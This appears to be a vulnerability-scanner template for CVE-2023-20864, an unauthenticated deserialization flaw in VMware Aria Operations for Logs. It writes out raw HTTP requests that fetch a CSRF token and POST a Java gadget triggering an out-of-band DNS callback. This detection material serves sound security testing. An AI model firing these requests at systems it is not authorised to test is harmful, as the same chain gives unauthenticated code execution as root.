id: CVE-2023-20864 info: name: VMware Aria Operations for Logs - Unauthenticated Remote Code Execution author: rootxharsh,iamnoooob,pdresearch severity: critical description: | VMware Aria Operations for Logs contains a deserialization vulnerability. An unauthenticated, malicious actor with network access to VMware Aria Operations for Logs may be able to execute arbitrary code as root. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Apply the necessary security patches or updates provided by VMware to mitigate this vulnerability. reference: - https://www.vmware.com/security/advisories/VMSA-2023-0007.html - https://nvd.nist.gov/vuln/detail/CVE-2023-20864 - https://github.com/Threekiii/CVE classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-20864 cwe-id: CWE-502 epss-score: 0.29094 epss-percentile: 0.96766 cpe: cpe:2.3:a:vmware:aria_operations_for_logs:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: vmware product: aria_operations_for_logs shodan-query: title:"vRealize Log Insight" tags: cve2023,cve,vmware,aria,rce,oast http: - raw: - | GET /csrf HTTP/1.1 Host: {{Hostname}} X-Csrf-Token: Fetch - | POST /api/v2/internal/cluster/applyMembership HTTP/1.1 Host: {{Hostname}} X-CSRF-Token: {{xcsrftoken}} Content-type: application/octet-stream {{generate_java_gadget("dns", "http://{{interactsh-url}}", "raw")}} matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "dns" - type: word part: body words: - '"errorMessage":"Internal error' extractors: - type: kval name: xcsrftoken group: 1 internal: true kval: - "X_CSRF_Token" # digest: 4b0a00483046022100d81a1f67f8e41f50b8995bae686ab49b507ce0fa2517c60658b8ac8630d9871a022100def2a9f72d0bdacf1fba5cc1236dac40a103ff7edb620cff13fc41f501660326:922c64590222798bb761d5b6d8e72950